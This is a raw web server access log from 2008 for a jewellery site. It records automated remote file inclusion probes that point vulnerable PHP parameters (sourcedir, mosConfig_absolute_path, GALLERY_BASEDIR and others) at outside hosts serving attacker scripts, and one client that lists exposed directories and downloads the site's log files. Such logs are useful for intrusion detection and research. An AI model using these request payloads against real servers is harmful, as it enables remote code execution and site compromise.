212.97.132.101 - - [30/Aug/2008:18:13:31 -0700] "GET //?path%5Bdocroot%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 200 763 "-" "libwww-perl/5.53" "www.sojewels.com"
212.97.132.101 - - [30/Aug/2008:18:13:31 -0700] "GET /logs//?path%5Bdocroot%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 200 1785 "-" "libwww-perl/5.53" "www.sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:34 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:34 -0700] "GET /logs HTTP/1.1" 301 88 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:34 -0700] "GET /logs/ HTTP/1.1" 200 1796 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:34 -0700] "GET /tmp HTTP/1.1" 301 87 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:35 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:35 -0700] "GET /logs/access.log HTTP/1.1" 200 25701 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:37 -0700] "GET /logs/access_080301.log HTTP/1.1" 200 393216 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:38 -0700] "GET /logs/access_080331.log HTTP/1.1" 200 393216 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:40 -0700] "GET /logs/access_080501.log HTTP/1.1" 200 393216 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:41 -0700] "GET /logs/access_080531.log HTTP/1.1" 200 393216 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:43 -0700] "GET /logs/access_080701.log HTTP/1.1" 200 393216 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:44 -0700] "GET /logs/access_080731.log HTTP/1.1" 200 393216 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:46 -0700] "GET /logs/access_080831.log HTTP/1.1" 200 393216 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:47 -0700] "GET /logs/scripts.log HTTP/1.1" 200 254866 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:48 -0700] "GET //?D=D HTTP/1.1" 200 779 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:48 -0700] "GET //logs HTTP/1.1" 301 89 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:48 -0700] "GET //logs/ HTTP/1.1" 200 1799 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:49 -0700] "GET //tmp HTTP/1.1" 301 88 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:49 -0700] "GET //tmp/ HTTP/1.1" 200 523 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:49 -0700] "GET /logs/?D=A HTTP/1.1" 200 1796 "-" "Java/1.6.0_01" "sojewels.com"
24.132.226.94 - - [30/Aug/2008:18:13:49 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Java/1.6.0_01" "sojewels.com"
206.248.167.129 - - [30/Aug/2008:18:15:14 -0700] "GET /logs/access.log/?sourcedir=http://www.sos-booterz.net/files/600/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
206.248.167.129 - - [30/Aug/2008:18:15:14 -0700] "GET /?sourcedir=http://www.sos-booterz.net/files/600/oye.txt%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
206.248.167.129 - - [30/Aug/2008:18:15:14 -0700] "GET /logs/?sourcedir=http://www.sos-booterz.net/files/600/oye.txt%0D?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "www.sojewels.com"
74.6.22.171 - - [30/Aug/2008:18:15:32 -0700] "GET /logs/?S=D HTTP/1.0" 200 1780 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
206.248.167.129 - - [30/Aug/2008:18:15:48 -0700] "GET /logs/access_080331.log/?sourcedir=http://www.sos-booterz.net/files/600/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.48.67.39 - - [30/Aug/2008:18:16:15 -0700] "GET /logs/access_080331.log/?sourcedir=http://www.sos-booterz.net/files/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.48.67.39 - - [30/Aug/2008:18:16:15 -0700] "GET /?sourcedir=http://www.sos-booterz.net/files/id2.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
210.48.67.39 - - [30/Aug/2008:18:16:16 -0700] "GET /logs/?sourcedir=http://www.sos-booterz.net/files/id2.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
212.97.132.101 - - [30/Aug/2008:18:16:45 -0700] "GET /logs/access_080501.log%20//?path%5Bdocroot%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.sojewels.com"
210.48.67.39 - - [30/Aug/2008:18:18:25 -0700] "GET /logs/access.log/?sourcedir=http://www.sos-booterz.net/files/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.11.67.242 - - [30/Aug/2008:18:20:41 -0700] "GET /?sourcedir=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.sojewels.com"
217.20.138.101 - - [30/Aug/2008:18:23:48 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sojewels.com"
217.20.138.101 - - [30/Aug/2008:18:23:48 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sojewels.com"
209.8.239.117 - - [30/Aug/2008:18:25:37 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
209.8.239.117 - - [30/Aug/2008:18:25:37 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
209.8.239.117 - - [30/Aug/2008:18:25:37 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
194.79.75.195 - - [30/Aug/2008:18:25:54 -0700] "GET /logs/access_080301.log//amember/common.inc.php?config[check_email]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
194.79.75.195 - - [30/Aug/2008:18:25:54 -0700] "GET //amember/common.inc.php?config[check_email]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
194.79.75.195 - - [30/Aug/2008:18:25:54 -0700] "GET /logs//amember/common.inc.php?config[check_email]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:24 -0700] "GET /logs/access_080331.log/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:25 -0700] "GET /logs/access_080331.log/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:25 -0700] "GET /index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:25 -0700] "GET /index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:25 -0700] "GET /logs/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:25 -0700] "GET /logs/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:25 -0700] "GET /logs/access_080331.log/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:25 -0700] "GET /index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:28:25 -0700] "GET /logs/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:29:39 -0700] "GET /logs/access.log/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:29:41 -0700] "GET /logs/access.log/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
205.211.11.1 - - [30/Aug/2008:18:29:42 -0700] "GET /logs/access.log/index.php?sourcedir=http://br.geocities.com/kaizoku_56/sak4w/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
64.20.53.210 - - [30/Aug/2008:18:31:41 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.sojewels.com"
64.20.53.210 - - [30/Aug/2008:18:31:41 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.sojewels.com"
216.55.159.47 - - [30/Aug/2008:18:31:55 -0700] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
216.55.159.47 - - [30/Aug/2008:18:31:55 -0700] "GET /My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
216.55.159.47 - - [30/Aug/2008:18:31:56 -0700] "GET /logs/access.log/My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
66.98.192.98 - - [30/Aug/2008:18:32:07 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.sojewels.com"
66.98.192.98 - - [30/Aug/2008:18:32:07 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.sojewels.com"
72.233.63.178 - - [30/Aug/2008:18:36:54 -0700] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Aug/2008:18:36:55 -0700] "GET /My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Aug/2008:18:36:55 -0700] "GET /logs/access.log/My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
216.55.159.47 - - [30/Aug/2008:18:39:27 -0700] "GET /logs/access_080531.log/My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
58.8.153.195 - - [30/Aug/2008:18:39:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.sojewels.com"
81.9.63.18 - - [30/Aug/2008:18:40:14 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.sojewels.com"
81.9.63.18 - - [30/Aug/2008:18:40:14 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.sojewels.com"
66.187.101.14 - - [30/Aug/2008:18:41:18 -0700] "GET /logs/access_080331.log//appserv/main.php?appserv_root=http://pagardewa.100webspace.net/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
66.187.101.14 - - [30/Aug/2008:18:41:18 -0700] "GET //appserv/main.php?appserv_root=http://pagardewa.100webspace.net/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
66.187.101.14 - - [30/Aug/2008:18:41:18 -0700] "GET /logs//appserv/main.php?appserv_root=http://pagardewa.100webspace.net/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.181.105.117 - - [30/Aug/2008:18:42:44 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sojewels.com"
202.181.105.117 - - [30/Aug/2008:18:42:44 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sojewels.com"
59.106.54.82 - - [30/Aug/2008:18:42:52 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
59.106.54.82 - - [30/Aug/2008:18:42:52 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
202.142.223.177 - - [30/Aug/2008:18:45:58 -0700] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
202.142.223.177 - - [30/Aug/2008:18:45:58 -0700] "GET /My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
202.142.223.177 - - [30/Aug/2008:18:45:58 -0700] "GET /logs/access.log/My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
72.233.63.178 - - [30/Aug/2008:18:47:39 -0700] "GET /logs/access_080531.log/My_eGallery/public/displayCategory.php?basepath=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
58.8.153.195 - - [30/Aug/2008:18:49:07 -0700] "GET //common/db.php?commonpath=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.sojewels.com"
58.8.153.195 - - [30/Aug/2008:18:49:12 -0700] "GET /logs//common/db.php?commonpath=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.sojewels.com"
65.18.170.161 - - [30/Aug/2008:18:50:54 -0700] "GET /logs/access_080331.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
65.18.170.161 - - [30/Aug/2008:18:50:54 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
65.18.170.161 - - [30/Aug/2008:18:50:54 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
208.80.193.29 - - [30/Aug/2008:18:54:34 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Versatel.de ISDN 0404; .NET CLR 1.1.4322; Crazy Browser 2.0.0)" "sojewels.com"
217.96.120.45 - - [30/Aug/2008:18:56:10 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
217.96.120.45 - - [30/Aug/2008:18:56:10 -0700] "GET /logs/access_080331.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
217.96.120.45 - - [30/Aug/2008:18:56:10 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
213.198.63.60 - - [30/Aug/2008:18:58:55 -0700] "GET /errors.php?error=http://www.importacionesenergia.com/administrator/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
194.85.91.156 - - [30/Aug/2008:19:00:28 -0700] "GET /logs/access_080331.log/?sourcedir=http://www.sos-booterz.net/files/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
194.85.91.156 - - [30/Aug/2008:19:00:28 -0700] "GET /?sourcedir=http://www.sos-booterz.net/files/id2.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
194.85.91.156 - - [30/Aug/2008:19:00:28 -0700] "GET /logs/?sourcedir=http://www.sos-booterz.net/files/id2.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
66.98.192.98 - - [30/Aug/2008:19:03:24 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.sojewels.com"
66.98.192.98 - - [30/Aug/2008:19:03:25 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.sojewels.com"
217.147.236.10 - - [30/Aug/2008:19:04:35 -0700] "GET /logs/access_080301.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sojewels.com"
217.20.138.101 - - [30/Aug/2008:19:04:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sojewels.com"
217.20.138.101 - - [30/Aug/2008:19:04:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sojewels.com"
194.85.91.156 - - [30/Aug/2008:19:05:12 -0700] "GET /logs/access.log/?sourcedir=http://www.sos-booterz.net/files/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
64.20.53.210 - - [30/Aug/2008:19:05:49 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.sojewels.com"
64.20.53.210 - - [30/Aug/2008:19:05:52 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.sojewels.com"
84.222.232.96 - - [30/Aug/2008:19:07:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.sojewels.com"
84.222.232.96 - - [30/Aug/2008:19:07:48 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:08:14 -0700] "GET /logs/access.log//?page=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:08:14 -0700] "GET //?page=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:08:14 -0700] "GET /logs//?page=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 200 1801 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:09:47 -0700] "GET /logs/access.log//?p=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:09:47 -0700] "GET //?p=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:09:47 -0700] "GET /logs//?p=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 200 1801 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:09:58 -0700] "GET /logs//?pag=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 200 1801 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:09:58 -0700] "GET /logs/access.log//?pag=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:19:09:58 -0700] "GET //?pag=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.sojewels.com"
216.70.73.146 - - [30/Aug/2008:19:11:42 -0700] "GET /logs/access_080331.log/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
216.70.73.146 - - [30/Aug/2008:19:11:43 -0700] "GET /?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
194.85.91.156 - - [30/Aug/2008:19:12:06 -0700] "GET /logs/access_080331.log/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
194.85.91.156 - - [30/Aug/2008:19:12:07 -0700] "GET /?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
59.106.19.213 - - [30/Aug/2008:19:12:07 -0700] "GET /logs/access_080331.log/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
59.106.19.213 - - [30/Aug/2008:19:12:07 -0700] "GET /?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
216.70.73.146 - - [30/Aug/2008:19:12:11 -0700] "GET /logs/access_080331.log/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
216.70.73.146 - - [30/Aug/2008:19:12:11 -0700] "GET /?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Aug/2008:19:12:44 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.punarbhava.in/images/di??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sojewels.com"
